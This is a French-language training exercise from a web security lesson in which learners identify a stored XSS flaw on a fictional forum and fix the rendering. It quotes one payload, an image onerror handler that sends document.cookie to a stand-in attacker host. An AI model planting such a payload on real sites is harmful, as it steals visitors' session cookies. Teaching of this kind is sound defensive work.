Retour à la leçon
Mission

Mission : le commentaire piégé du forum Technologik

Identifier le type de XSS exploité dans un scénario concret et corriger le rendu vulnérable côté serveur et frontend.

Contexte

Sur le forum d'entraide de Technologik, un utilisateur poste un commentaire contenant <img src=x onerror="fetch('https://evil.example/steal?c='+document.cookie)">. Ce commentaire est stocké en base puis affiché sans échappement à chaque visiteur de la page. Le cookie de session du forum n'a pas l'attribut HttpOnly.